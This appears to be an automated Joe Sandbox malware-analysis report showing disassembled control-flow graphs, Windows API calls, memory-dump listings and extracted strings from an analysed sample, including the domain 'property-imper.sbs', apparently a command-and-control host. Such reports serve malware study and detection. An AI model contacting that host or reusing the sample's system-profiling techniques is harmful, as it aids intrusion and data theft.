6891->6893 6899 30df70 LdrInitializeThunk 6891->6899 6893->6868 6894->6872 6895->6875 6896->6879 6897->6883 6898->6885 6899->6893 6900 2de35b 6901 2de361 6900->6901 6902 2de370 CoUninitialize 6901->6902 6903 2de3a0 6902->6903 6904 2ddc33 6906 2ddcd0 6904->6906 6905 2ddd4e 6906->6905 6908 30df70 LdrInitializeThunk 6906->6908 6908->6905 6909 2dceb3 CoInitializeSecurity 6929 2e9130 6930 30b8e0 2 API calls 6929->6930 6931 2e9158 6930->6931 6963 2edb30 6964 2edb70 6963->6964 6964->6964 6967 2db210 6964->6967 6968 2db2a0 6967->6968 6968->6968 6969 2db2d6 6968->6969 6970 30ded0 RtlAllocateHeap RtlReAllocateHeap 6968->6970 6970->6968 6950 2ddef2 6951 2ddf20 6950->6951 6951->6951 6952 2ddf9e 6951->6952 6954 30df70 LdrInitializeThunk 6951->6954 6954->6952

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 0 2f3d70-2f3db5 call 310480 3 2f3dbb-2f3e24 call 2e9500 call 30b7e0 0->3 4 2f451a-2f452a 0->4 9 2f3e29-2f3e37 3->9 9->9 10 2f3e39 9->10 11 2f3e3b-2f3e3e 10->11 12 2f3e66-2f3e6d 11->12 13 2f3e40-2f3e64 11->13 14 2f3e6f-2f3e7a 12->14 13->11 15 2f3e7c 14->15 16 2f3e81-2f3e98 14->16 17 2f3f3b-2f3f3e 15->17 18 2f3e9f-2f3eaa 16->18 19 2f3e9a-2f3f28 16->19 22 2f3f42-2f3f47 17->22 23 2f3f40 17->23 20 2f3eac-2f3f1c call 30df70 18->20 21 2f3f2a-2f3f2f 18->21 19->21 30 2f3f21-2f3f26 20->30 26 2f3f33-2f3f36 21->26 27 2f3f31 21->27 28 2f3f4d-2f3f5d 22->28 29 2f442b-2f4470 call 30b860 22->29 23->22 26->14 27->17 32 2f3f5f-2f3f7c 28->32 36 2f4475-2f4483 29->36 30->21 34 2f4134 32->34 35 2f3f82-2f3fa1 32->35 37 2f4138-2f413b 34->37 38 2f3fa3-2f3fa6 35->38 36->36 39 2f4485 36->39 40 2f413d-2f4141 37->40 41 2f4143-2f4154 call 30b7e0 37->41 42 2f3fbf-2f3fdd call 2f4530 38->42 43 2f3fa8-2f3fbd 38->43 45 2f4487-2f448a 39->45 46 2f416a-2f416c 40->46 57 2f4166-2f4168 41->57 58 2f4156-2f4161 41->58 42->34 55 2f3fe3-2f401e 42->55 43->38 49 2f448c-2f44b0 45->49 50 2f44b2-2f44b9 45->50 52 2f4404-2f4409 46->52 53 2f4172-2f4191 46->53 49->45 56 2f44bb-2f44c1 50->56 59 2f440b-2f4413 52->59 60 2f4415-2f4419 52->60 54 2f4196-2f41a1 53->54 54->54 62 2f41a3-2f41ab 54->62 63 2f4023-2f4031 55->63 64 2f44c5-2f44d9 56->64 65 2f44c3 56->65 57->46 66 2f441d-2f4421 58->66 61 2f441b 59->61 60->61 61->66 67 2f41ad-2f41b0 62->67 63->63 69 2f4033-2f4037 63->69 70 2f44dd-2f44e3 64->70 71 2f44db 64->71 65->4 66->32 68 2f4427-2f4429 66->68 74 2f41e2-2f4217 67->74 75 2f41b2-2f41e0 67->75 68->29 77 2f4039-2f403c 69->77 72 2f450a-2f450d 70->72 73 2f44e5-2f4505 call 30df70 70->73 71->72 79 2f450f-2f4511 72->79 80 2f4513-2f4518 72->80 73->72 81 2f421c-2f4227 74->81 75->67 82 2f403e-2f4062 77->82 83 2f4064-2f4082 call 2f4530 77->83 79->4 80->56 81->81 84 2f4229-2f422b 81->84 82->77 90 2f408d-2f40ad 83->90 91 2f4084-2f4088 83->91 86 2f422f-2f4232 84->86 88 2f4254-2f4258 86->88 89 2f4234-2f4252 86->89 92 2f425a-2f4265 88->92 89->86 93 2f40af 90->93 94 2f40b1-2f4132 call 2d82b0 call 2e9160 call 2d82c0 90->94 91->37 95 2f426c-2f4283 92->95 96 2f4267 92->96 93->94 94->37 99 2f428a-2f4295 95->99 100 2f4285-2f4321 95->100 98 2f4334-2f4337 96->98 103 2f433b-2f435c 98->103 104 2f4339 98->104 106 2f429b-2f4315 call 30df70 99->106 107 2f4323-2f4328 99->107 100->107 114 2f4361-2f436c 103->114 104->103 113 2f431a-2f431f 106->113 110 2f432c-2f432f 107->110 111 2f432a 107->111 110->92 111->98 113->107 114->114 116 2f436e 114->116 118 2f4370-2f4373 116->118 120 2f4399-2f439f 118->120 121 2f4375-2f4397 118->121 122 2f43d5-2f43d8 120->122 123 2f43a1-2f43a5 120->123 121->118 125 2f43ed-2f43f3 122->125 126 2f43da-2f43e1 call 30b860 122->126 124 2f43a7-2f43ae 123->124 127 2f43be-2f43c7 124->127 128 2f43b0-2f43bc 124->128 130 2f43f5-2f43f8 125->130 133 2f43e6-2f43eb 126->133 131 2f43cb 127->131 132 2f43c9 127->132 128->124 130->52 134 2f43fa-2f4402 130->134 135 2f43d1-2f43d3 131->135 132->135 133->130 134->66 135->122
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1521207615.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                                                                • Associated: 00000005.00000002.1521183556.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521207615.0000000000315000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521278975.0000000000327000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000329000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000004B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000596000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521723487.00000000005D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522234851.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522260423.0000000000773000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_2d0000_file.jbxd
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID: $!@$,$9$:$;$`$`$`$e$e$e$f$f$f$g$g$g$n
                                                                                • API String ID: 1279760036-1524723224
                                                                                • Opcode ID: 0eb62452ea16579325e7cfed0dd8a128a82445c53c4dabb6646f280633e4e7d7
                                                                                • Instruction ID: 9c483843ef35f02f50dd999e643cc424e23caf21014f13db614ff1b2256c31ad
                                                                                • Opcode Fuzzy Hash: 0eb62452ea16579325e7cfed0dd8a128a82445c53c4dabb6646f280633e4e7d7
                                                                                • Instruction Fuzzy Hash: 0B22ACB152C3848FD321EF28C4903AFFBE1AB95354F28496DE6D987392D2B58855CB43

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 136 309030-309089 137 309090-3090c6 136->137 137->137 138 3090c8-3090e4 137->138 140 3090f1-30913f 138->140 141 3090e6 138->141 143 309145-309177 140->143 144 30968c-3096b8 call 30f9a0 GetVolumeInformationW 140->144 141->140 146 309180-3091af 143->146 149 3096ba 144->149 150 3096bc-3096df call 2f0650 144->150 146->146 148 3091b1-3091e4 SysAllocString 146->148 154 309674-309688 148->154 155 3091ea-309204 CoSetProxyBlanket 148->155 149->150 156 3096e0-3096e8 150->156 154->144 157 30966a-309670 155->157 158 30920a-309225 155->158 156->156 159 3096ea-3096ec 156->159 157->154 161 309230-309262 158->161 163 3096fe-30972d call 2f0650 159->163 164 3096ee-3096fb call 2d8330 159->164 161->161 162 309264-3092df 161->162 171 3092e0-30930b 162->171 172 309730-309738 163->172 164->163 171->171 173 30930d-30933d 171->173 172->172 174 30973a-30973c 172->174 185 309343-309365 173->185 186 309658-309668 SysFreeString * 2 173->186 175 30974e-30977d call 2f0650 174->175 176 30973e-30974b call 2d8330 174->176 182 309780-309788 175->182 176->175 182->182 184 30978a-30978c 182->184 187 30979e-3097cb call 2f0650 184->187 188 30978e-30979b call 2d8330 184->188 193 30964b-309655 185->193 194 30936b-30936e 185->194 186->157 197 3097d0-3097d8 187->197 188->187 193->186 194->193 196 309374-309379 194->196 196->193 199 30937f-3093cf 196->199 197->197 200 3097da-3097dc 197->200 205 3093d0-309416 199->205 201 3097ee-3097f5 200->201 202 3097de-3097eb call 2d8330 200->202 202->201 205->205 207 309418-30942d 205->207 208 309431-309433 207->208 209 309636-309647 208->209 210 309439-30943f 208->210 209->193 210->209 211 309445-309452 210->211 213 309454-309459 211->213 214 30948d 211->214 216 30946c-309470 213->216 215 30948f-3094b7 call 2d82b0 214->215 225 3095e8-3095f9 215->225 226 3094bd-3094cb 215->226 219 309460 216->219 220 309472-30947b 216->220 222 309461-30946a 219->222 223 309482-309486 220->223 224 30947d-309480 220->224 222->215 222->216 223->222 227 309488-30948b 223->227 224->222 229 309600-30960c 225->229 230 3095fb 225->230 226->225 228 3094d1-3094d5 226->228 227->222 231 3094e0-3094ea 228->231 232 309613-309633 call 2d82e0 call 2d82c0 229->232 233 30960e 229->233 230->229 234 309500-309506 231->234 235 3094ec-3094f1 231->235 232->209 233->232 238 309525-309533 234->238 239 309508-30950b 234->239 237 309590-309596 235->237 245 309598-30959e 237->245 242 309535-309538 238->242 243 3095aa-3095b3 238->243 239->238 241 30950d-309523 239->241 241->237 242->243 248 30953a-309581 242->248 246 3095b5-3095b7 243->246 247 3095b9-3095bc 243->247 245->225 250 3095a0-3095a2 245->250 246->245 252 3095e4-3095e6 247->252 253 3095be-3095e2 247->253 248->237 250->231 251 3095a8 250->251 251->225 252->237 253->237
                                                                                APIs
                                                                                • SysAllocString.OLEAUT32(13C511C2), ref: 003091B7
                                                                                • CoSetProxyBlanket.COMBASE(0000FDFC,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 003091FC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1521207615.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                                                                • Associated: 00000005.00000002.1521183556.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521207615.0000000000315000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521278975.0000000000327000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000329000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000004B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000596000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521723487.00000000005D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522234851.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522260423.0000000000773000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_2d0000_file.jbxd
                                                                                Similarity
                                                                                • API ID: AllocBlanketProxyString
                                                                                • String ID: =3$E!q#$E!q#$Lgfe$\$IK
                                                                                • API String ID: 900851650-3206278330
                                                                                • Opcode ID: 73372e66164a59340e1f523bd981471ae3e11c9723302ab8e04b4be339f99b20
                                                                                • Instruction ID: e5bb7dde7270d89b454d39bf99d76143de2a6b833cab2cd914f7fdfca0f46621
                                                                                • Opcode Fuzzy Hash: 73372e66164a59340e1f523bd981471ae3e11c9723302ab8e04b4be339f99b20
                                                                                • Instruction Fuzzy Hash: B42261B29093009FE325CF20CC91B6BBBAAEFC5314F058A1DE5949B2C2D775D905CB92

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 254 2dcf05-2dcf12 255 2dcf20-2dcf5c 254->255 255->255 256 2dcf5e-2dcfa5 call 2d8930 call 309030 255->256 261 2dcfb0-2dcffc 256->261 261->261 262 2dcffe-2dd06b 261->262 263 2dd070-2dd097 262->263 263->263 264 2dd099-2dd0aa 263->264 265 2dd0ac-2dd0b3 264->265 266 2dd0cb-2dd0d3 264->266 267 2dd0c0-2dd0c9 265->267 268 2dd0eb-2dd0f8 266->268 269 2dd0d5-2dd0d6 266->269 267->266 267->267 271 2dd11b-2dd123 268->271 272 2dd0fa-2dd101 268->272 270 2dd0e0-2dd0e9 269->270 270->268 270->270 274 2dd13b-2dd266 271->274 275 2dd125-2dd126 271->275 273 2dd110-2dd119 272->273 273->271 273->273 276 2dd270-2dd2ce 274->276 277 2dd130-2dd139 275->277 276->276 278 2dd2d0-2dd2ff 276->278 277->274 277->277 279 2dd300-2dd31a 278->279 279->279 280 2dd31c-2dd36b call 2db960 279->280 283 2dd370-2dd3ac 280->283 283->283 284 2dd3ae-2dd3c5 call 2d8930 call 309030 283->284 288 2dd3ca-2dd3eb 284->288 289 2dd3f0-2dd43c 288->289 289->289 290 2dd43e-2dd4ab 289->290 291 2dd4b0-2dd4d7 290->291 291->291 292 2dd4d9-2dd4ea 291->292 293 2dd4ec-2dd4ef 292->293 294 2dd4fb-2dd503 292->294 295 2dd4f0-2dd4f9 293->295 296 2dd51b-2dd528 294->296 297 2dd505-2dd506 294->297 295->294 295->295 299 2dd54b-2dd557 296->299 300 2dd52a-2dd531 296->300 298 2dd510-2dd519 297->298 298->296 298->298 302 2dd559-2dd55a 299->302 303 2dd56b-2dd696 299->303 301 2dd540-2dd549 300->301 301->299 301->301 304 2dd560-2dd569 302->304 305 2dd6a0-2dd6fe 303->305 304->303 304->304 305->305 306 2dd700-2dd72f 305->306 307 2dd730-2dd74a 306->307 307->307 308 2dd74c-2dd791 call 2db960 307->308
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1521207615.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                                                                • Associated: 00000005.00000002.1521183556.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521207615.0000000000315000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521278975.0000000000327000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000329000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000004B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000596000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521723487.00000000005D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522234851.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522260423.0000000000773000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_2d0000_file.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ()$+S7U$,_"Q$0C%E$7W"i$;[*]$<KuM$F53C5DF390721698D7CBBD6DF28D3732$N3F5$S7HI$property-imper.sbs$y?O1$c]e$gy
                                                                                • API String ID: 0-875770010
                                                                                • Opcode ID: 1142db5d5a936cebd8d5c983c6c60ea61682fd33f6d701e8a2ee94edb83c38e6
                                                                                • Instruction ID: 6ae8f81721ee665f6c9d1608d1c0dec1fe00ea6afdfef083dacb202360df87be
                                                                                • Opcode Fuzzy Hash: 1142db5d5a936cebd8d5c983c6c60ea61682fd33f6d701e8a2ee94edb83c38e6
                                                                                • Instruction Fuzzy Hash: FB121DB15983C28ED3358F25D495BEFBBE1EBD6304F18896DC4DA5B252C770090ACB92

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 311 2d98f0-2d98fe 312 2d9e75 311->312 313 2d9904-2d997f call 2d61a0 call 2d82b0 311->313 315 2d9e77-2d9e83 312->315 319 2d9980-2d99b5 313->319 319->319 320 2d99b7-2d99df call 2d9210 319->320 323 2d99e0-2d9a5b 320->323 323->323 324 2d9a5d-2d9a99 call 2d9210 323->324 327 2d9aa0-2d9ae1 324->327 327->327 328 2d9ae3-2d9b2f call 2d9210 327->328 331 2d9b30-2d9b56 328->331 331->331 332 2d9b58-2d9b6f 331->332 333 2d9b70-2d9bdc 332->333 333->333 334 2d9bde-2d9c0e call 2d9210 333->334 337 2d9c10-2d9c6e 334->337 337->337 338 2d9c70-2d9d4b call 2d94d0 337->338 341 2d9d50-2d9d7e 338->341 341->341 342 2d9d80-2d9d88 341->342 343 2d9d8a-2d9d92 342->343 344 2d9db1-2d9dbc 342->344 347 2d9da0-2d9daf 343->347 345 2d9dbe-2d9dc1 344->345 346 2d9de1-2d9e0b 344->346 348 2d9dd0-2d9ddf 345->348 349 2d9e10-2d9e36 346->349 347->344 347->347 348->346 348->348 349->349 350 2d9e38-2d9e58 call 2dc570 call 2d82c0 349->350 354 2d9e5d-2d9e73 350->354 354->315
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1521207615.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                                                                • Associated: 00000005.00000002.1521183556.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521207615.0000000000315000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521278975.0000000000327000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000329000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000004B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000596000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521723487.00000000005D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522234851.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522260423.0000000000773000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_2d0000_file.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: DG$F53C5DF390721698D7CBBD6DF28D3732$Ohs,$chs,$fhnf$fhnf$xy$su${}
                                                                                • API String ID: 0-2056823161
                                                                                • Opcode ID: 879fc6ff8bdad07573c8447e72e9a203c2c26d6f6e54ca7e31d5d03ac5ace431
                                                                                • Instruction ID: fd91d8ffa4c3ff247af764a8d8948902e8dba106a9f326190fcae464a82f7ae2
                                                                                • Opcode Fuzzy Hash: 879fc6ff8bdad07573c8447e72e9a203c2c26d6f6e54ca7e31d5d03ac5ace431
                                                                                • Instruction Fuzzy Hash: 98E15A72A583504BD328CF35C85136BBBE6ABD5314F198A2EF5E58B395D634C805CB82

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 355 2de35b-2de393 call 304600 call 2d98f0 CoUninitialize 360 2de3a0-2de3d2 355->360 360->360 361 2de3d4-2de3ef 360->361 362 2de3f0-2de428 361->362 362->362 363 2de42a-2de499 362->363 364 2de4a0-2de4ba 363->364 364->364 365 2de4bc-2de4cd 364->365 366 2de4cf-2de4df 365->366 367 2de4eb-2de4f3 365->367 368 2de4e0-2de4e9 366->368 369 2de50b-2de515 367->369 370 2de4f5-2de4f6 367->370 368->367 368->368 372 2de52b-2de533 369->372 373 2de517-2de51b 369->373 371 2de500-2de509 370->371 371->369 371->371 375 2de54b-2de555 372->375 376 2de535-2de536 372->376 374 2de520-2de529 373->374 374->372 374->374 378 2de56b-2de577 375->378 379 2de557-2de55b 375->379 377 2de540-2de549 376->377 377->375 377->377 380 2de579-2de57b 378->380 381 2de591-2de6b3 378->381 382 2de560-2de569 379->382 383 2de580-2de58d 380->383 384 2de6c0-2de6da 381->384 382->378 382->382 383->383 385 2de58f 383->385 384->384 386 2de6dc-2de70f 384->386 385->381 387 2de710-2de72b 386->387 387->387 388 2de72d-2de77d call 2db960 387->388
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1521207615.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                                                                • Associated: 00000005.00000002.1521183556.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521207615.0000000000315000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521278975.0000000000327000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000329000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000004B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000596000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521723487.00000000005D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522234851.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522260423.0000000000773000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_2d0000_file.jbxd
                                                                                Similarity
                                                                                • API ID: Uninitialize
                                                                                • String ID: Lk$U\$Zb$property-imper.sbs$r
                                                                                • API String ID: 3861434553-2211913898
                                                                                • Opcode ID: 0a6b0f3a687d3f21e686a040340831db5c6d17cb4e0260f2aed0a4c67b6d9a61
                                                                                • Instruction ID: 1c49958bc50739f6473a1bd5d649652ddd99bfa822eba920e2ce0ba086f6df5c
                                                                                • Opcode Fuzzy Hash: 0a6b0f3a687d3f21e686a040340831db5c6d17cb4e0260f2aed0a4c67b6d9a61
                                                                                • Instruction Fuzzy Hash: 98A1BCB011C3D18ADB759F25D4947EBBBE1AF93308F188A9DD0E94B282DB394506CB47

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 399 2d4040-2d4062 call 2d82b0 402 2d4068-2d408f 399->402 403 2d460a-2d4613 399->403 404 2d4096-2d40b2 call 2d82b0 402->404 405 2d4091 402->405 408 2d441d-2d4426 call 2d82c0 404->408 409 2d40b8-2d40d6 404->409 405->404 408->403 411 2d4121-2d4126 409->411 412 2d4128-2d412d 411->412 413 2d4103-2d410e 411->413 416 2d412f-2d4131 412->416 417 2d4155-2d4157 412->417 415 2d4112-2d411f 413->415 415->411 418 2d4165-2d416c 415->418 419 2d4144-2d414c 416->419 417->415 422 2d416e 418->422 423 2d4173-2d42b9 call 2d8330 * 3 418->423 420 2d414e-2d4153 419->420 421 2d4140-2d4142 419->421 420->421 421->419 424 2d40e0-2d40f3 call 2d82d0 421->424 422->423 435 2d432b-2d434a call 2d2900 423->435 436 2d42bb-2d42c4 423->436 430 2d4159-2d4163 424->430 431 2d40f5-2d4101 424->431 430->415 431->413 441 2d442b-2d4438 call 2d82c0 435->441 442 2d4350-2d43b9 call 2d82e0 435->442 437 2d42fc-2d4325 call 2d2900 436->437 446 2d4327-2d4329 437->446 447 2d42d0-2d42fa call 2d2900 437->447 453 2d4600-2d4608 call 2d82c0 441->453 451 2d43c0-2d43ec 442->451 446->447 447->435 447->437 454 2d443d-2d445e call 2d82e0 451->454 455 2d43ee-2d441b 451->455 453->403 460 2d44a4-2d44d6 454->460 461 2d4460-2d4465 454->461 455->451 462 2d44d8-2d44e2 460->462 463 2d44f7-2d44f9 460->463 464 2d4474-2d447c 461->464 465 2d4467 461->465 469 2d44fe-2d4506 462->469 470 2d44e4-2d44ec 462->470 471 2d45a0-2d45d7 call 2d82c0 463->471 467 2d447e-2d4483 464->467 468 2d4470-2d4472 464->468 466 2d45e9-2d45ff call 2d82c0 465->466 466->453 467->468 468->464 472 2d4485-2d4491 call 2d82d0 468->472 477 2d4510-2d4567 469->477 475 2d4572-2d4593 470->475 476 2d44f2 470->476 479 2d45dc-2d45e3 471->479 484 2d45e5 472->484 485 2d4497-2d44a1 472->485 478 2d459a-2d459c 475->478 476->478 477->477 482 2d4569-2d4570 477->482 478->471 479->403 482->475 482->478 484->466 485->460
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1521207615.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                                                                • Associated: 00000005.00000002.1521183556.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521207615.0000000000315000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521278975.0000000000327000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000329000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000004B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000596000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521723487.00000000005D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522234851.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522260423.0000000000773000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_2d0000_file.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: )$)$IEND
                                                                                • API String ID: 0-588110143
                                                                                • Opcode ID: 24b891db3e3a37e96f2230860bcd6fb4268a2486f4a2a02b7a3d15d0ab522cb5
                                                                                • Instruction ID: 7ecbb50a3fd157e614ee783522987606283e39bd5e4f54338adfb3d2c7ccf8ed
                                                                                • Opcode Fuzzy Hash: 24b891db3e3a37e96f2230860bcd6fb4268a2486f4a2a02b7a3d15d0ab522cb5
                                                                                • Instruction Fuzzy Hash: 17F110B1A187429BE314EF28D85576BBBE0BB94304F14462EF99997381D774EC24CBC2

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 591 2d89a0-2d89b1 call 30cb70 594 2d89b7-2d89cf call 306620 591->594 595 2d8cb3-2d8cbb ExitProcess 591->595 599 2d8cae call 30deb0 594->599 600 2d89d5-2d89fb 594->600 599->595 604 2d89fd-2d89ff 600->604 605 2d8a01-2d8bda 600->605 604->605 607 2d8c8a-2d8ca2 call 2d9ed0 605->607 608 2d8be0-2d8c50 605->608 607->599 613 2d8ca4 call 2dce80 607->613 609 2d8c56-2d8c88 608->609 610 2d8c52-2d8c54 608->610 609->607 610->609 615 2d8ca9 call 2db930 613->615 615->599
                                                                                APIs
                                                                                • ExitProcess.KERNEL32(00000000), ref: 002D8CB6
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1521207615.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
